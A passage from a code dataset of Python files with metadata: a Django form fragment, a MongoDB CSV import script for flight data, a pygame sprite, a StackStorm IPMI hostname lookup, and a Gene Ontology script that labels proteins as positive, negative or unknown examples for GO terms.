self.fields.update(self._extra_fields)\n\n def save(self, commit=True):\n if hasattr(self, 'data'):\n self.instance.data = json.dumps(\n {\n field_name: self.cleaned_data[field_name]\n for field_name in self._extra_fields.keys()\n 
}\n )\n\n return super(FlexibleForm, self).save(commit)\n\n class Meta:\n model = GenericModel\n fields = []\n", "sub_path": "hhcodingtask/data_saver/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 908, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.forms.ModelForm", "line_number": 10, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 10, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 16, "usage_type": "call"}, {"api_name": "utils.get_form_fields", "line_number": 20, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 26, "usage_type": "call"}, {"api_name": "models.GenericModel", "line_number": 36, "usage_type": "name"}]} +{"seq_id": "231651007", "text": "import os\nimport sys\nimport csv\nimport logging\n\nfrom pymongo.errors import DuplicateKeyError\nfrom pyramid.paster import (\n get_appsettings,\n setup_logging,\n)\n\nfrom pyramid.scripts.common import parse_vars\n\nfrom airflight.collections import mongo_client_\nfrom ..collections import AirportCollection, AirlineCollection, RouteCollection\n\nlogger = logging.getLogger(__name__)\n\n\ndef usage(argv):\n cmd = os.path.basename(argv[0])\n print('usage: %s [var=value]\\n'\n '(example: \"%s development.ini\")' % (cmd, cmd))\n sys.exit(1)\n\n\ndef main(argv=sys.argv):\n \"\"\"\n Import data into mongo collections\n \"\"\"\n here = os.path.dirname(__file__)\n # Create file key with absolute path, class and fields\n COLLECTIONS = [\n {'klass': AirlineCollection,\n 'file': os.path.join(here, '../../data/airlines.csv'),\n 'fields': [\n 'name',\n '2_digit_code',\n '3_digit_code',\n 'country'\n ]\n },\n {'klass': AirportCollection,\n 'file': os.path.join(here, '../../data/airports.csv'),\n 'fields': [\n 'name',\n 'city',\n 'country',\n 'iata_3',\n 'latitute',\n 'longitude'\n ]\n },\n {'klass': RouteCollection,\n 'file': os.path.join(here, '../../data/routes.csv'),\n 'fields': [\n 'airline_id',\n 'origin',\n 'destination'\n ]\n }\n ]\n\n if len(argv) < 2:\n usage(argv)\n config_uri = argv[1]\n options = parse_vars(argv[2:])\n setup_logging(config_uri)\n settings = get_appsettings(config_uri, options=options)\n # Setup of MongoClient\n mongo_client_.setup(url=settings.get('mongo.url'),\n db=settings.get('mongo.db'))\n for collection in COLLECTIONS:\n\n mongo_collection = collection['klass']()\n with open(collection['file'], 'r') as csv_file:\n fields = collection['fields']\n csv_reader = csv.reader(csv_file, delimiter=',')\n for k, row in enumerate(csv_reader):\n # must ignore the headers\n if k > 0:\n # Convert to dict using fields\n to_dict = dict(zip(fields, row))\n try:\n mongo_collection.insert(data=to_dict)\n except DuplicateKeyError as e:\n logger.info(f\"This data already exist {str(to_dict)} \\n\") # noqa\n", "sub_path": "airflight/scripts/initialize_db.py", "file_name": "initialize_db.py", "file_ext": "py", "file_size_in_byte": 2529, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "logging.getLogger", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 24, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 31, "usage_type": "call"}, 
{"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "collections.AirlineCollection", "line_number": 34, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "collections.AirportCollection", "line_number": 43, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path", "line_number": 44, "usage_type": "attribute"}, {"api_name": "collections.RouteCollection", "line_number": 54, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path", "line_number": 55, "usage_type": "attribute"}, {"api_name": "pyramid.scripts.common.parse_vars", "line_number": 67, "usage_type": "call"}, {"api_name": "pyramid.paster.setup_logging", "line_number": 68, "usage_type": "call"}, {"api_name": "pyramid.paster.get_appsettings", "line_number": 69, "usage_type": "call"}, {"api_name": "airflight.collections.mongo_client_.setup", "line_number": 71, "usage_type": "call"}, {"api_name": "airflight.collections.mongo_client_", "line_number": 71, "usage_type": "name"}, {"api_name": "csv.reader", "line_number": 78, "usage_type": "call"}, {"api_name": "pymongo.errors.DuplicateKeyError", "line_number": 86, "usage_type": "name"}]} +{"seq_id": "585551849", "text": "import pygame\nfrom pygame.sprite import Sprite\nimport random\n\n\nclass TNT(Sprite):\n def __init__(self, screen):\n super().__init__()\n self.screen = screen\n self.screen_rect = screen.get_rect()\n self.image = pygame.image.load(\"tnt.jpg\")\n self.rect = self.image.get_rect()\n self.rect.centerx = random.randint(132, 1130)\n self.rect.top = self.screen_rect.top\n self.y = float(self.rect.y)\n self.speed = 0.4\n\n def update(self):\n self.y += self.speed\n self.rect.y = self.y\n\n def blitme(self):\n self.screen.blit(self.image, self.rect)\n", "sub_path": "tnt.py", "file_name": "tnt.py", "file_ext": "py", "file_size_in_byte": 619, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pygame.sprite.Sprite", "line_number": 6, "usage_type": "name"}, {"api_name": "pygame.image.load", "line_number": 11, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 11, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "581671928", "text": "##############################################################################\n# Copyright 2018 Parker Berberian and Others #\n# #\n# Licensed under the Apache License, Version 2.0 (the \"License\"); #\n# you may not use this file except in compliance with the License. #\n# You may obtain a copy of the License at #\n# #\n# http://www.apache.org/licenses/LICENSE-2.0 #\n# #\n# Unless required by applicable law or agreed to in writing, software #\n# distributed under the License is distributed on an \"AS IS\" BASIS, #\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #\n# See the License for the specific language governing permissions and #\n# limitations under the License. 
#\n##############################################################################\n\nimport sqlite3\nfrom st2actions.runners.pythonrunner import Action\n\n\nclass ipmi_infoAction(Action):\n\n def run(self, host=None):\n db_file = self.action_service.get_value(name=\"database\", local=False)\n db = sqlite3.connect(db_file)\n c = db.cursor()\n ipmi_host = c.execute(\"SELECT host FROM ipmi WHERE host=?\", (host,)).fetchone()\n if ipmi_host:\n db.close()\n return host\n host_number = c.execute(\"SELECT server_number FROM hosts WHERE hostname=?\", (host,)).fetchone()[0]\n ipmi_host = c.execute(\"SELECT host FROM ipmi WHERE server_number=?\", (host_number,)).fetchone()\n db.close()\n return ipmi_host[0]\n", "sub_path": "laas/actions/actions/get_ipmi_hostname.py", "file_name": "get_ipmi_hostname.py", "file_ext": "py", "file_size_in_byte": 1871, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "st2actions.runners.pythonrunner.Action", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlite3.connect", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "562852659", "text": "#!/usr/bin/env \n\nimport os, sys\nfrom optparse import OptionParser\nfrom collections import defaultdict\nimport networkx as nx\n# See the tutorial of obonet here: \n# https://github.com/dhimmel/obonet/blob/master/examples/go-obonet.ipynb\nimport obonet\nimport pandas as pd\nfrom tqdm import tqdm\n\n\n# Guide to GO evidence codes: http://geneontology.org/page/guide-go-evidence-codes\nALL_EVIDENCE_CODES = ['EXP','IDA','IPI','IMP','IGI','IEP','ISS','ISO','ISA','ISM','IGC','IBA','IBD','IKR','IRD','RCA','TAS','NAS','IC','ND','IEA']\n\n\ndef parse_obo_file_and_build_dags(obo_file):\n \"\"\"\n Parse the GO OBO into a networkx MultiDiGraph using obonet.\n Then construct a DAG for each category using the 'is_a' relationships \n \n *returns*: a dictionary containing a DAG for each of the 3 GO categories 'C', 'F', and 'P'\n \"\"\"\n global id_to_name\n global name_to_id\n global goid_to_category # mapping from a GO term ID and the category it belongs to ('C', 'F' or 'P')\n\n print(\"Reading GO OBO file from %s\" % (obo_file))\n # obonet returns a networkx MultiDiGraph object containing all of the relationships in the ontology\n graph = obonet.read_obo(obo_file)\n # build a mapping from the GO term IDs to the name of the GO term\n id_to_name = {id_: data['name'] for id_, data in graph.nodes(data=True)}\n name_to_id = {data['name']: id_ for id_, data in graph.nodes(data=True)}\n goid_to_category = {} \n print(\"\\t%d nodes, %d edges\" % (graph.number_of_nodes(),graph.number_of_edges()))\n\n # make sure this really is a DAG\n if nx.is_directed_acyclic_graph(graph) is False:\n print(\"\\tWarning: graph is not a dag\")\n\n # copied this section from cell 19 of https://github.com/IGACAT/DataPreprocessing/blob/master/scripts/populate_go_terms.ipynb\n # Extract all edges with \"is_a\" relationship.\n # I did not include \"part_of\" relationships because the molecular_function and biological_process DAGs are not separate from each other if I do\n is_a_edge_list = []\n for child, parent, key in graph.out_edges(keys=True):\n if key == 'is_a':\n is_a_edge_list.append((child, parent))\n\n # get a is_a-type edge-induced subgraph \n is_a_subG = nx.MultiDiGraph(is_a_edge_list)\n full_to_category = {'cellular_component': 'C', 'biological_process': 'P', 'molecular_function' : 'F'}\n go_dags = {}\n # there are 3 weakly_connected_components. 
One for each category\n for wcc in nx.weakly_connected_components(is_a_subG):\n G = is_a_subG.subgraph(wcc)\n\n # store this DAG in the dictionary of GO DAGs\n # find the root node \n root_node = None # find root_node (no out_edge) \n for node in G.nodes():\n if G.out_degree(node) == 0:\n root_node = node\n #print(root_node, id_to_name[node])\n break\n c = full_to_category[id_to_name[root_node]]\n print(\"\\tDAG for %s has %d nodes\" % (id_to_name[root_node], len(wcc)))\n go_dags[c] = G\n\n # also set the category for each GO term\n for n in G.nodes():\n goid_to_category[n] = c\n\n return go_dags\n\n\ndef parse_gaf_file(gaf_file, pos_neg_ec=[], rem_neg_ec=[], ignore_ec=[]):\n \"\"\"\n Parse a GAF file containing direct annotations (i.e. annotations have not been propogated up the GO DAG)\n\n Calls the function setup_evidence_code_categories() to assign each evidence code \n to either the *pos_neg_ec* set, *rem_neg_ec* set, or the *ignore_ec* set. See that function\n for more description\n\n Returns:\n *prot_goids_by_c*: for each category ('C', 'F', or 'P'), \n contains the set of GO term IDs to which each protein is annotated (*pos_neg_ec* codes)\n *goid_prots*: contains the set of proteins annotated to each GO term ID (*pos_neg_ec* codes)\n *goid_rem_neg_prots*: contains the set of proteins annotated to each GO term ID (*rem_neg_ec* codes)\n *all_prots*: all proteins. Used to assign unknowns\n \"\"\"\n\n print(\"Setting up evidence code categories\")\n pos_neg_ec, rem_neg_ec, ignore_ec = setup_evidence_code_categories(pos_neg_ec, rem_neg_ec, ignore_ec)\n\n print(\"Reading annotations from GAF file %s.\" % (gaf_file))\n\n # dictionary with key: uniprotID, val: set of goterm IDs annotated to the protein\n # split by hierarchy/category so we can just pass a given categories's annotations when defining negatives\n prot_goids_by_c = {\"C\": defaultdict(set), \"F\": defaultdict(set), \"P\": defaultdict(set)}\n # dictionary with key: goterm ID, val: set of proteins annotated to the goterm ID \n goid_prots = defaultdict(set)\n goid_rem_neg_prots = defaultdict(set)\n all_prots = set()\n num_not_ann = 0\n num_pos_neg_ann = 0\n num_rem_neg_ann = 0\n num_ignored_ann = 0 \n\n # if they pass in a GAF file:\n with open(gaf_file, 'r') as f:\n for line in f:\n cols = line.rstrip().split('\\t')\n prot = cols[1]\n all_prots.add(prot)\n goid = cols[4]\n evidence_code = cols[6]\n category = cols[8]\n # for now, ignore cellular component annotations\n if category == \"C\":\n continue\n # skip NOT annotations for now\n if \"NOT\" in cols[3]:\n num_not_ann += 1 \n continue\n\n if evidence_code in ignore_ec:\n num_ignored_ann += 1\n elif evidence_code in pos_neg_ec:\n num_pos_neg_ann += 1\n prot_goids_by_c[category][prot].add(goid)\n goid_prots[goid].add(prot) \n elif evidence_code in rem_neg_ec:\n num_rem_neg_ann += 1\n goid_rem_neg_prots[goid].add(prot)\n else:\n print(\"WARNING: evidence_code '%s' not recognized\" % (evidence_code))\n\n print(\"\\t%d NOT annotations ignored\" % (num_not_ann)) \n print(\"\\t%d \\\"pos_neg_ec\\\" annotations\" % (num_pos_neg_ann))\n print(\"\\t%d \\\"rem_neg_ec\\\" annotations\" % (num_rem_neg_ann))\n print(\"\\t%d \\\"ignore_ec\\\" annotations\" % (num_ignored_ann))\n print(\"\\t%d proteins have 1 or more BP annotations\" % (len(prot_goids_by_c[\"P\"])))\n print(\"\\t%d proteins have 1 or more MF annotations\" % (len(prot_goids_by_c[\"F\"])))\n\n return prot_goids_by_c, goid_prots, goid_rem_neg_prots, all_prots\n\n\ndef setup_evidence_code_categories(pos_neg_ec=[], 
rem_neg_ec=[], ignore_ec=[]):\n \"\"\"\n Assigns each evidence code to either the *pos_neg_ec*, *rem_neg_ec*, or the *ignore_ec* set\n *pos_neg_ec*: a list of GO evidence codes used to assign positive and negative examples.\n If none are specified, all evidence codes not in the two other categories will be put in this category by default.\n *rem_neg_ec*: a list of GO evidence codes used to remove negative examples.\n Specifically, If a protein would be labelled as a negative example for a given term \n but is annotated with a \"rem_neg\" evidence code for the term, it is instead labelled as unknown.\n If none are specified, but \"pos_neg_ec\" codes are given, \n all codes not in the other two categories will be put in this category by default.\n *ignore_ec*: a list of GO evidence codes to ignore completely when parsing the GAF file.\n If both --pos-neg-ec and --rem-neg-ec codes are given, everything else will be ignored by default.\n ND is always ignored.\n\n *returns*: *pos_neg_ec*, *rem_neg_ec*, *ignore_ec* \n \"\"\"\n # the ND annotation means there is no data available for this protein. \n # more information about the ND annotation is available here: http://geneontology.org/page/nd-no-biological-data-available\n if \"ND\" not in ignore_ec:\n print(\"\\tIngoring the evidence code 'ND' because it means there is no data available for this protein\")\n ignore_ec.append(\"ND\")\n\n # set the positive codes to all of them by default\n # use lists instead of sets here to keep the original order\n if len(pos_neg_ec) == 0:\n # don't use sets to keep the order of the codes\n pos_neg_ec = [c for c in ALL_EVIDENCE_CODES\n if c not in rem_neg_ec and\n c not in ignore_ec]\n #pos_neg_ec = set(ALL_EVIDENCE_CODES).difference(set(rem_neg_ec)) \\\n # .difference(set(ignore_ec))\n # if 1 or more positive evidence codes are given, but no non-negative codes are given,\n # set the rest of the codes to be non-negative by default\n elif len(rem_neg_ec) == 0:\n rem_neg_ec = [c for c in ALL_EVIDENCE_CODES\n if c not in pos_neg_ec and\n c not in ignore_ec]\n # if 1 or more positive and 1 or more non-negative codes are given,\n # set the rest to be ignored by default\n else:\n ignore_ec = [c for c in ALL_EVIDENCE_CODES\n if c not in pos_neg_ec and\n c not in rem_neg_ec]\n\n print()\n print(\"pos_neg_ec (used to assign positive and negative examples):\" +\n \"\\n\\t'%s'\" % (\"','\".join(pos_neg_ec))) \n print(\"rem_neg_ec (used to remove negative examples):\" +\n \"\\n\\t'%s'\" % (\"','\".join(rem_neg_ec))) \n print(\"ignore_ec (ignored completely when assigning examples):\" +\n \"\\n\\t'%s'\" % (\"','\".join(ignore_ec)))\n print()\n\n # make sure the sets are non-overlapping\n if len(set(pos_neg_ec).intersection(set(rem_neg_ec))) != 0 or \\\n len(set(pos_neg_ec).intersection(set(ignore_ec))) != 0 or \\\n len(set(rem_neg_ec).intersection(set(ignore_ec))) != 0:\n sys.stderr.write(\"ERROR: the three sets are not disjoint. 
\" +\n \"Please ensure the three input sets have no overlapping evidence codes.\\n\")\n sys.exit(1)\n\n return pos_neg_ec, rem_neg_ec, ignore_ec\n\n\ndef extract_high_freq_goterms(G, goids, annotated_prots, cutoff=1000):\n \"\"\"\n *G*: GO DAG (networkx DiGraph) with prot->goid edges for each protein's annotations\n returns a set of GO terms with > cutoff proteins annotated to it \n \"\"\"\n high_freq_go_terms = set() \n for goid in tqdm(goids):\n anc = nx.ancestors(G, goid)\n # the number of positive annotations for this GO term is the number of proteins that can reach this GO term ID in the gene-goid graph\n # meaning the number of proteins annotated to this term plus those annotated to an ancestral, more specific term\n if len(anc.intersection(annotated_prots)) > cutoff:\n high_freq_go_terms.add(goid) \n\n return high_freq_go_terms\n\n\ndef build_gene_goterm_graph(go_dag, goid_prots):\n \"\"\"\n For every protein, add an edge from the protein to the GO term IDs to which it's annotated\n *go_dag*: networkx DiGraph DAG containing the is_a edges in the GO DAG \n *goid_prots*: contains the set of proteins annotated to each GO term ID\n\n *returns*: the resulting gene-goterm graph (networkx DiGraph), and the graph reversed.\n \"\"\"\n\n G = nx.DiGraph()\n G.add_edges_from(go_dag.edges())\n\n # revG is a copy of the annotation graph G with the GO DAG reversed\n revG = nx.reverse(G, copy=True)\n\n # set all of the current nodes as goids\n #nx.set_node_attributes(G, 'goid', 'type')\n\n # For every GO term ID, add an edge in the graph from the proteins annotated to the GO term ID, to the GO term ID\n # This graph allows us to get all of the proteins annotated to descendants (more specific terms) of a term\n for goid in go_dag.nodes():\n for prot in goid_prots[goid]:\n # add an edge from the protein to the GO term its annotated to\n G.add_edge(prot, goid)\n revG.add_edge(prot, goid)\n\n print(\"\\t%d nodes, %d edges\" % (G.number_of_nodes(),G.number_of_edges()))\n\n return G, revG\n\n\ndef assign_pos_neg(goid, G, revG, annotated_prots, rem_negG=None):\n \"\"\"\n This function assigns the set of positive and negative proteins for a given GO term ID.\n Specifically, for the given GO term t, we define a gene/protein g as a \n - positive if g is directly annotated to t or to a descendant of t (more specific term) in the GO DAG\n - negative if g is not annotated to t or an ancestor or descendant of t in the GO DAG, but also has at least 1 other annotation\n - unknown if g is neither a positive nor a negative meaning it has no annotations, \n or is annotated to an ancestor of t (more general term) in the GO DAG\n\n Parameters:\n *goid*: GO term for which to assign positives and negatives\n *G*: GO DAG with prot->goid edges for each protein's annotations\n *revG*: reverse of G. Used to find all of the proteins annotated to descendant or less-specific GO terms \n *annotated_prots*: all proteins with at least one direct annotation (in the GO category of the given GO term). 
\n Used to assign negatives and get the protein nodes from G and revG\n *rem_negG*: version of the annotation graph G which contains the rem_neg_ec annotations to remove negative examples\n\n Returns:\n *positives*: the set of proteins labelled as positives\n *negatives*: the set of proteins labelled as negatives \n \"\"\"\n\n # positives are all of the proteins can reach this GO term.\n positives = set(nx.ancestors(G, goid)).intersection(annotated_prots)\n # proteins that can be reached from this term are unknowns \n unknowns = set(nx.ancestors(revG, goid)).intersection(annotated_prots)\n ## if this node is directly annotated to the term, it's a positive\n #unknowns.difference_update(positives)\n\n if rem_negG is not None:\n # if the protein is annotated to the term, or a more specific term, with a non-negative (remove negative) evidence code,\n # don't use it as a negative\n rem_negs = set(nx.ancestors(rem_negG, goid)).intersection(annotated_prots)\n unknowns.update(rem_negs)\n\n # negatives are all of the proteins with an annotation that are not an ancestor, or descendant \n negatives = annotated_prots.difference(positives) \\\n .difference(unknowns)\n\n return positives, negatives\n\n\ndef assign_all_pos_neg(high_freq_goids, G, revG, annotated_prots, all_prots, rem_negG=None, verbose=False):\n \"\"\"\n Assigns each gene as a positive/negative/unknown example for each GO term. \n\n Parameters: \n *high_freq_goids*: goids for which to get positives and negatives. Should all belong to a single category\n *G*: annotation graph\n *revG*: annotation graph with GO DAG reversed\n *annotated_prots*: all proteins with a direct annotation (in the GO category of the high_freq_goids). Used to assign negatives\n *all_prots*: all proteins. Used to assign unknowns\n *rem_negG*: version of the annotation graph G which contains the rem_neg_ec annotations to remove negative examples\n *verbose*: print the # of positives, negatives and unknowns for each GO term\n\n Returns:\n *goid_pos*: dictionary of a set of positive examples for each GO term\n *goid_neg*: dictionary of a set of negative examples for each GO term\n *goid_unk*: dictionary of a set of unknown examples for each GO term\n \"\"\"\n global id_to_name, name_to_id\n\n print(\"Getting positives and negatives for %d GO terms\" % (len(high_freq_goids)))\n\n # dictionaries containing the set of positives and negatives respectively for each GO term ID\n goid_pos = {}\n goid_neg = {}\n goid_unk = {}\n # for each GO term, get the set of positives and the set of negatives, and store them in a dictionary\n for goid in tqdm(sorted(high_freq_goids)):\n positives, negatives = assign_pos_neg(goid, G, revG, annotated_prots, rem_negG=rem_negG)\n goid_pos[goid] = positives\n goid_neg[goid] = negatives\n goid_unk[goid] = all_prots.difference(positives).difference(negatives) \n if verbose is True:\n tqdm.write(\"\\t%d positives, %d negatives, %d unknowns for %s (%s)\" % (len(positives), len(negatives), len(goid_unk[goid]), id_to_name[goid], goid))\n\n return goid_pos, goid_neg, goid_unk\n\n\ndef build_pos_neg_table(high_freq_goids, goid_pos, goid_neg, goid_unk, summary_only=False):\n \"\"\"\n Builds a table with a positive/negative/unknown (1/-1/0) assignment for each gene-GO term pair. \n Rows are the genes and columns are the given high_freq_goids (GO terms with > cutoff proteins annotated) \n\n Parameters: \n *high_freq_goids*: goids for which to get positives and negatives. 
Should all belong to a single category\n *goid_pos*: positive examples for each GO term\n *goid_neg*: negative examples for each GO term\n *goid_unk*: unknown examples for each GO term\n *summary_only*: build and return only the summary table\n\n Returns:\n *df*: the table as a pandas DataFrame \n *df_summary*: a table containing the # of positive, negative and unknown examples for each GO term\n \"\"\"\n global id_to_name, name_to_id, goid_to_category\n\n if summary_only is False:\n print(\"Building a table with positive/negative/unknown assignments for each protein-goterm pair\")\n # build a table with the first column being the genes, and a column for each of the terms with > cutoff annotations indicating 1/-1/0 assignment for each gene\n pos_neg_table = defaultdict(dict)\n # build a double dictionary with either 1, -1 or 0 for each GO term protein pair\n # TODO there must be a better pandas method to construct the table\n for goid in tqdm(high_freq_goids):\n for prot in goid_pos[goid]:\n pos_neg_table[goid][prot] = 1\n for prot in goid_neg[goid]:\n pos_neg_table[goid][prot] = -1\n # unknowns are everything that is not a positive or negative\n for prot in goid_unk[goid]:\n pos_neg_table[goid][prot] = 0\n\n df = pd.DataFrame(pos_neg_table)\n\n df_summary = pd.DataFrame({\n \"GO term name\": {goid: id_to_name[goid] for goid in high_freq_goids},\n \"GO category\": {goid: goid_to_category[goid] for goid in high_freq_goids},\n \"# positive examples\": {goid: len(pos) for goid, pos in goid_pos.items()}, \n \"# negative examples\": {goid: len(neg) for goid, neg in goid_neg.items()}, \n \"# unknown examples\": {goid: len(unk) for goid, unk in goid_unk.items()}\n })\n # set the order of the columns\n cols = [\"GO term name\", \"GO category\", \"# positive examples\", \"# negative examples\", \"# unknown examples\"]\n df_summary = df_summary[cols] \n df_summary.index.rename(\"GO term\", inplace=True)\n\n if summary_only is False:\n return df, df_summary\n else:\n return df_summary\n\n\ndef main(obo_file, gaf_file, out_pref, cutoff=1000, write_table=False,\n pos_neg_ec=[], rem_neg_ec=[], ignore_ec=[]):\n # first parse the gaf and obo files\n direct_prot_goids_by_c, direct_goid_prots, direct_goid_rem_neg_prots, all_prots = parse_gaf_file(\n gaf_file, pos_neg_ec, rem_neg_ec, ignore_ec)\n go_dags = parse_obo_file_and_build_dags(obo_file)\n\n # keep track of the summary stats for each category, and combine them into one table in the end\n df_summaries = pd.DataFrame()\n\n # assign the positives, negatives and unknowns for biological process and molecular function\n for c in [\"P\", \"F\"]:\n print(\"Category: %s\" % (c))\n print(\"Building the gene-goterm graph\")\n G, revG = build_gene_goterm_graph(go_dags[c], direct_goid_prots)\n rem_negG = None\n if len(direct_goid_rem_neg_prots) > 0:\n # the remove-negative annotations also need to be be propagated, so build an annotation graph for them here\n rem_negG, rem_neg_revG = build_gene_goterm_graph(go_dags[c], direct_goid_rem_neg_prots)\n #print(\"# of prots with at least 1 %s annotation: %d\" % (c, len(prot_goids)))\n #print(\"# of %s GO terms with at 1 protein annotated to it: %d\" % (c, len(goid_prots)))\n\n print(\"Extracting GO terms with > %d annotations\" % (cutoff))\n annotated_prots = set(direct_prot_goids_by_c[c].keys())\n high_freq_goids = extract_high_freq_goterms(G, go_dags[c].nodes(), annotated_prots, cutoff=cutoff)\n # also remove biological process, cellular component and molecular function\n 
high_freq_goids.difference_update(set([name_to_id[name] for name in [\"cellular_component\", \"biological_process\", \"molecular_function\"]]))\n print(\"\\t%d (out of %d) GO terms have > %d proteins annotated to them\" % (len(high_freq_goids), go_dags[c].number_of_nodes(), cutoff))\n\n # keep track of the set of proteins with at least 1 annotation in this category to assign negatives later\n goid_pos, goid_neg, goid_unk = assign_all_pos_neg(high_freq_goids, G, revG, annotated_prots, all_prots, rem_negG=rem_negG)\n\n # now write it to a file\n category = {\"C\": \"cc\", \"P\": \"bp\", \"F\": \"mf\"}\n if write_table is True:\n # build a table containing a positive/negative/unknown assignment for each protein-goterm pair\n df, df_summary = build_pos_neg_table(high_freq_goids, goid_pos, goid_neg, goid_unk)\n # combine the summary stats for all categories into one table\n df_summaries = pd.concat([df_summaries, df_summary])\n\n out_file = \"%spos-neg-%s-%d.tsv\" % (out_pref, category[c], cutoff)\n print(\"Writing table containing positive/negative/unknown assignments to %s\" % (out_file))\n df.to_csv(out_file, sep=\"\\t\")\n else:\n # build a summary table of the pos/neg/unk assignments\n df_summary = build_pos_neg_table(high_freq_goids, goid_pos, goid_neg, goid_unk, summary_only=True)\n # combine the summary stats for all categories into one table\n df_summaries = pd.concat([df_summaries, df_summary])\n out_file = \"%spos-neg-%s-%d-list.tsv\" % (out_pref, category[c], cutoff)\n print(\"Writing file containing positive/negative assignments to %s\" % (out_file))\n with open(out_file, 'w') as out:\n out.write(\"#goid\\tpos/neg assignment\\tprots\\n\")\n for goid in high_freq_goids:\n out.write(\"%s\\t1\\t%s\\n\" % (goid, ','.join(goid_pos[goid])))\n out.write(\"%s\\t-1\\t%s\\n\" % (goid, ','.join(goid_neg[goid])))\n\n output_summary_file = \"%spos-neg-%d-summary-stats.tsv\" % (out_pref, cutoff)\n # maybe make this into an option later instead of always writing it\n #if output_summary_file is not None:\n print(\"Writing summary table of # of positive, negative and unknown examples for each GO term to: %s\" % (output_summary_file))\n df_summaries.to_csv(output_summary_file, sep='\\t')\n\n\ndef parse_args(args):\n ## Parse command line args.\n description = \"\"\"\nThis script takes the annotations in a GAF file, and the GO DAG and assigns \nevery gene as either a positive (1), negative (-1) or unknown (0) for each GO term with > cutoff annotations.\nWrites two tab-separated tables containing the assignments, one for BP and one for MF, where the rows are genes, \nand the columns are GO term IDs. Also writes a summary statistics table\n\"\"\"\n usage = '%prog [options] '\n parser = OptionParser(usage=usage, description=description)\n parser.add_option('-g', '--gaf-file', type='string',\n help=\"File containing GO annotations in GAF format. Required\")\n parser.add_option('-b', '--obo-file', type='string', \n help=\"GO OBO file which contains the GO DAG. Required\")\n #parser.add_option('-n', '--negatives', type='string', default='non-ancestral',\n # help=\"Types of negatives to generate. Options are: '%s'. Default = 'non-ancestral', See the README file for descriptions of these options.\" % (\"', '\".join(NEGATIVES_OPTIONS)))\n parser.add_option('-c', '--cutoff', type='int', default=1000,\n help=\"GO terms having > cutoff positive instances (proteins) are kept. 
Default=1000\")\n parser.add_option('-o', '--out-pref', type='string', \n help=\"Prefix used to write a table of positives, negatives, and unknowns for each GO category.\" +\n \"Writes an output file for BP and MF: pos-neg--P.tsv and pos-neg--F.tsv\")\n # writing the big pos/neg/unk assignment matrix is taking too long. \n # instead, write the pos/neg prots for each GO term to a file\n parser.add_option('', '--write-table', action='store_true', default=False,\n help=\"write the pos/neg/unk assignments to a table rather than the default comma-separated list of prots\")\n parser.add_option('', '--pos-neg-ec', type='string',\n help=\"Comma-separated list of evidence codes used to assign positive and negative examples. \" +\n \"If none are specified, all codes not in the two other categories \" + \n \"(--rem-neg-ec and --ignore-ec) will be used by default.\")\n parser.add_option('', '--rem-neg-ec', type='string',\n help=\"Comma-separated list of evidence codes used to remove negative examples. \" + \n \"Specifically, If a protein would be labelled as a negative example for a given term \" + \n \"but is annotated with a 'rem_neg' evidence code for the term, it is instead labelled as unknown. \" +\n \"If none are specified, but --pos-neg-ec codes are given, \" +\n \"all codes not in the other two categories will be put in this category by default.\")\n parser.add_option('', '--ignore-ec', type='string',\n help=\"Comma-separated list of evidence codes where annotations with the specified codes will be ignored when parsing the GAF file. \" +\n \"For example, specifying 'IEA' will skip all annotations with an evidence code 'IEA'. \" +\n \"If both --pos-neg-ec and --rem-neg-ec codes are given, everything else will be ignored by default.\")\n\n (opts, args) = parser.parse_args(args)\n\n if opts.gaf_file is None or opts.obo_file is None or opts.out_pref is None:\n parser.print_help()\n sys.exit(\"\\n--gaf-file (-g), --obo-file (-b), and --out-pref (-o) are required\")\n\n # make sure all of the specified codes are actually GO evidence codes\n codes = []\n for codes_option in [opts.pos_neg_ec, opts.rem_neg_ec, opts.ignore_ec]:\n if codes_option is not None:\n codes += codes_option.split(',')\n non_evidence_codes = set(codes).difference(set(ALL_EVIDENCE_CODES))\n if len(non_evidence_codes) > 0:\n sys.stderr.write(\"ERROR: the specified code(s) are not GO evidence codes: '%s'\\n\" % (\"', '\".join(non_evidence_codes)))\n sys.stderr.write(\"Accepted evidence codes: '%s'\\n\" % (\"', '\".join(ALL_EVIDENCE_CODES)))\n sys.exit(1)\n\n # check if the output prefix is writeable\n out_dir = os.path.dirname(opts.out_pref)\n if not os.path.isdir(out_dir):\n sys.stderr.write(\"ERROR: output directory %s specified by --out-pref doesn't exist\\n\" % (out_dir))\n sys.exit(1)\n\n return opts, args\n\n\nif __name__ == \"__main__\":\n print(\"Running %s\" % (' '.join(sys.argv)))\n opts, args = parse_args(sys.argv)\n pos_neg_ec = [] if opts.pos_neg_ec is None else opts.pos_neg_ec.split(',') \n rem_neg_ec = [] if opts.rem_neg_ec is None else opts.rem_neg_ec.split(',') \n ignore_ec = [] if opts.ignore_ec is None else opts.ignore_ec.split(',') \n main(opts.obo_file, opts.gaf_file, opts.out_pref, cutoff=opts.cutoff, 